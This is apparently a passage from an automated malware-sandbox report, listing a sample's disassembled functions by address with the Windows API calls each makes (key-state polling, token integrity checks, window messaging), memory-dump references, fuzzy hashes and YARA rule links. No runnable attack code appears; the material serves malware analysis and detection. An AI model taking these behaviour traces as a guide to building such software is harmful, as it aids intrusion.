                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 568ab65c4a33183e100c24efdb67f4e29d78d1548ed86b816db0d25c3d3887c2
                                                                                                                                                                      • Instruction ID: 29c3c4163814180d06cf3426a044e5b2c53d11b97fd1f8a276cd103f2ba24193
                                                                                                                                                                      • Opcode Fuzzy Hash: 568ab65c4a33183e100c24efdb67f4e29d78d1548ed86b816db0d25c3d3887c2
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D41E6B990050CAFC722DF28CC44FB9BBA8EB09310F164166FE5DA72E1D770AD41DA51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00372344, Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCursorPos.USER32(?,?,004367B0,?,004367B0,004367B0,?,003FC247,00000000,00000001,?,?,?,003ABC4F,?,?), ref: 00372357
                                                                                                                                                                      • ScreenToClient.USER32 ref: 00372374
                                                                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00372399
                                                                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 003723A7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4210589936-0
                                                                                                                                                                      • Opcode ID: 6db52cb07dd5fd9c68fa433eadacb7f943dbbbe6bccf991c1ba205c9fe6a95b8
                                                                                                                                                                      • Instruction ID: 4d3a40b10bd662c6bc98833466c0ca25ace28861aa58d63bae2512b63cacdda4
                                                                                                                                                                      • Opcode Fuzzy Hash: 6db52cb07dd5fd9c68fa433eadacb7f943dbbbe6bccf991c1ba205c9fe6a95b8
                                                                                                                                                                      • Instruction Fuzzy Hash: C5418239504119FFDF269F68C844AEEBB74FF06320F10831AF828962A1C7385954DF91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C6920, Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2108273632-0
                                                                                                                                                                      • Opcode ID: 4770d87341901c604a0bd8336ca3952da2a5c3cafc6ed179912d6b598e6674e5
                                                                                                                                                                      • Instruction ID: 9ac78d0ce0c0c2d64c655638896c97fb97a8e58cba68f3be2d856aaebaa47a5b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4770d87341901c604a0bd8336ca3952da2a5c3cafc6ed179912d6b598e6674e5
                                                                                                                                                                      • Instruction Fuzzy Hash: 8131C071904247AFDB229F74CC46FB6BBACAB05304F12817DE426D21A1EB34DC85DBA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C8F01, Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003C8F12
                                                                                                                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 003C8FBC
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 003C8FC4
                                                                                                                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 003C8FD2
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003C8FDA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3382505437-0
                                                                                                                                                                      • Opcode ID: 982087617ff10f46b8d6c8299c15abdeceda0c6739dff87449f03f5cf5a67fea
                                                                                                                                                                      • Instruction ID: 18fba4ee714870337cfe135d6359710f2e931fad635d07eb57257e37e664d4aa
                                                                                                                                                                      • Opcode Fuzzy Hash: 982087617ff10f46b8d6c8299c15abdeceda0c6739dff87449f03f5cf5a67fea
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D31BC71500219EFDB15CF68E948BAE7BBAEF44315F11422DF925EA2D0CBB09E14DB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CB6AF, Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindowVisible.USER32 ref: 003CB6C7
                                                                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003CB6E4
                                                                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003CB71C
                                                                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003CB742
                                                                                                                                                                      • _wcsstr.LIBCMT ref: 003CB74C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3902887630-0
                                                                                                                                                                      • Opcode ID: ffaadc5d0370719eae501038ed0deb0716b70eb7fdbbdb93b5141e9398e5f0bd
                                                                                                                                                                      • Instruction ID: aa6f4699607eef38dcb62186ab922f74ce284ecc76584818b887a745b63f65c4
                                                                                                                                                                      • Opcode Fuzzy Hash: ffaadc5d0370719eae501038ed0deb0716b70eb7fdbbdb93b5141e9398e5f0bd
                                                                                                                                                                      • Instruction Fuzzy Hash: 6921B372604204BAEB275B799C4AF7BBBACDF45750F01402DFC05DA1A1EF61DC409760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FB405, Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00372612: GetWindowLongW.USER32(?,000000EB), ref: 00372623
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 003FB44C
                                                                                                                                                                      • SetWindowLongW.USER32 ref: 003FB471
                                                                                                                                                                      • SetWindowLongW.USER32 ref: 003FB489
                                                                                                                                                                      • GetSystemMetrics.USER32 ref: 003FB4B2
                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,003E1184,00000000), ref: 003FB4D0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Long$MetricsSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2294984445-0
                                                                                                                                                                      • Opcode ID: 804395b29881fc99ec6df36f9062c6ad6d77b86da14fe903e11939adfee804bd
                                                                                                                                                                      • Instruction ID: 5e5a57df3673f33f19c25ab93eee07a0e46451e264b7f4b9c03724cb35199456
                                                                                                                                                                      • Opcode Fuzzy Hash: 804395b29881fc99ec6df36f9062c6ad6d77b86da14fe903e11939adfee804bd
                                                                                                                                                                      • Instruction Fuzzy Hash: 952194B1514219AFCB169F3ACD04A7A77A8EF05764F168734FE25C75E1E7309810DB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C97E9, Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003C9802
                                                                                                                                                                        • Part of subcall function 00377D2C: _memmove.LIBCMT ref: 00377D66
                                                                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003C9834
                                                                                                                                                                      • __itow.LIBCMT ref: 003C984C
                                                                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003C9874
                                                                                                                                                                      • __itow.LIBCMT ref: 003C9885
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$__itow$_memmove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2983881199-0
                                                                                                                                                                      • Opcode ID: f925a7de6ac3df8ae1eb85ddf8e114d7e551d1e1bc94e6dae2c989e83e11cca2
                                                                                                                                                                      • Instruction ID: 072165be20c0cac339d37b292ee3e3ffbdfbc06af2a6420dd76976aab186e5fe
                                                                                                                                                                      • Opcode Fuzzy Hash: f925a7de6ac3df8ae1eb85ddf8e114d7e551d1e1bc94e6dae2c989e83e11cca2
                                                                                                                                                                      • Instruction Fuzzy Hash: 0B21C871700308AFDF229A658C8AFEE7BACEF4A710F05402AFD04DB251DA708D41C791
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003712F3, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0037134D
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0037135C
                                                                                                                                                                      • BeginPath.GDI32(?), ref: 00371373
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0037139C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3225163088-0
                                                                                                                                                                      • Opcode ID: a98e47c98cbf61b738aed8f29d62aebd855f0e2e4fc52ccae3f0cc49a43c55fb
                                                                                                                                                                      • Instruction ID: e3a10d8958f0d5a19f44210bb23997535c9a7671c4a960f7f7ca149976adc068
                                                                                                                                                                      • Opcode Fuzzy Hash: a98e47c98cbf61b738aed8f29d62aebd855f0e2e4fc52ccae3f0cc49a43c55fb
                                                                                                                                                                      • Instruction Fuzzy Hash: A9217171801206FFEB26AF29DC04B697BFCFB04321F16C636F814965A0D7799891DBA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CC161, Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memcmp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2931989736-0
                                                                                                                                                                      • Opcode ID: e6fff83fe583395964c95105040f611e53202682833c861e1960c0f35eac0999
                                                                                                                                                                      • Instruction ID: 3ca0ff4b027a591099bbaaf6e1f5a7c2b5a7c224fde3034ed4af8567e9ffddb5
                                                                                                                                                                      • Opcode Fuzzy Hash: e6fff83fe583395964c95105040f611e53202682833c861e1960c0f35eac0999
                                                                                                                                                                      • Instruction Fuzzy Hash: 5201DDB3A141067BE607A5225D46F6B775CAF11394F19402AFE08FB6C3E764DE1183E4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D4D35, Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 003D4D5C
                                                                                                                                                                      • __beginthreadex.LIBCMT ref: 003D4D7A
                                                                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 003D4D8F
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003D4DA5
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003D4DAC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3824534824-0
                                                                                                                                                                      • Opcode ID: 8c374a737a4fc39d22c1becfa5aad66e767a15c604454d1357109859a967162a
                                                                                                                                                                      • Instruction ID: 76238fde3f01ded09f6f0d3d1b07a41eb2599c8d10c5e2574c8255a5e7e788c3
                                                                                                                                                                      • Opcode Fuzzy Hash: 8c374a737a4fc39d22c1becfa5aad66e767a15c604454d1357109859a967162a
                                                                                                                                                                      • Instruction Fuzzy Hash: B511C877904245BFC7129BA8AC08AEB7FADEB45320F158266FD14D3351D6758D44C7A0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C874A, Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003C8766
                                                                                                                                                                      • GetLastError.KERNEL32(?,003C822A,?,?,?), ref: 003C8770
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,003C822A,?,?,?), ref: 003C877F
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,003C822A,?,?,?), ref: 003C8786
                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003C879D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 842720411-0
                                                                                                                                                                      • Opcode ID: ef6c37d22ae0282e03cd7b1fbe9a14db291d0ce0c611a5087f41503c4f56eca2
                                                                                                                                                                      • Instruction ID: 818f24599968a0e0f45de932f47516fd49ade2d3df4c2aee31584ad81782288a
                                                                                                                                                                      • Opcode Fuzzy Hash: ef6c37d22ae0282e03cd7b1fbe9a14db291d0ce0c611a5087f41503c4f56eca2
                                                                                                                                                                      • Instruction Fuzzy Hash: C101FF75601204EFDB124FA5DC88DA77B6DEF85755B200579FD49C2260DA329D10CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D54E6, Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003D5502
                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003D5510
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 003D5518
                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003D5522
                                                                                                                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003D555E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2833360925-0
                                                                                                                                                                      • Opcode ID: 8da250690f05ecdb082e41abb15e72885e02cabde59323abcf589f45e57155cb
                                                                                                                                                                      • Instruction ID: 6d718e511760f63ee6652c13eae99a7bbdfd728da80167c1730142b9f167a7fd
                                                                                                                                                                      • Opcode Fuzzy Hash: 8da250690f05ecdb082e41abb15e72885e02cabde59323abcf589f45e57155cb
                                                                                                                                                                      • Instruction Fuzzy Hash: E5011B36D05A19DBCF02DFE9F848AEDBB79FF0A711F014466E902B2250DB305654C7A1
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C85F1, Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003C8608
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003C8612
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003C8621
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003C8628
                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003C863E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                      • Opcode ID: f2a44ddcf358866d5b8d64f4cfc7e784b284164b1a3f371eeb73fa3e493aac15
                                                                                                                                                                      • Instruction ID: 4ba1a5f2226917d28f5a3cb8ba23dfea4675efd285381eb77485a3b5c7aa3211
                                                                                                                                                                      • Opcode Fuzzy Hash: f2a44ddcf358866d5b8d64f4cfc7e784b284164b1a3f371eeb73fa3e493aac15
                                                                                                                                                                      • Instruction Fuzzy Hash: D3F04935201205BFEB124FA5DC89F7B3BACEF8A754F000429FA49C6250CB619D51DB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C8652, Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003C8669
                                                                                                                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003C8673
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003C8682
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003C8689
                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003C869F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                      • Opcode ID: 69f5f16fee2c905d3ec1d81c6ef46ff4413d09f9d7262846ced9d36b22b6a070
                                                                                                                                                                      • Instruction ID: e5aefa0d601aca0f902d3ddce2b9461cd6ba331496422b85c3a236702a37b646
                                                                                                                                                                      • Opcode Fuzzy Hash: 69f5f16fee2c905d3ec1d81c6ef46ff4413d09f9d7262846ced9d36b22b6a070
                                                                                                                                                                      • Instruction Fuzzy Hash: D6F03C75200205AFEB121FA5EC88EB73BACEF89B58F110029FA45C6150CB619D51DB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CC6A6, Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                                      • Opcode ID: 9c84483f705774f3494a49ccfd3ec0d7fbb5776a0a96d6f5ef8ad8e97034f1cd
                                                                                                                                                                      • Instruction ID: 011995b25d5b7b378f780b4b80bf950e8d05a52abaaa2c4bf20ca92cd15b4bcf
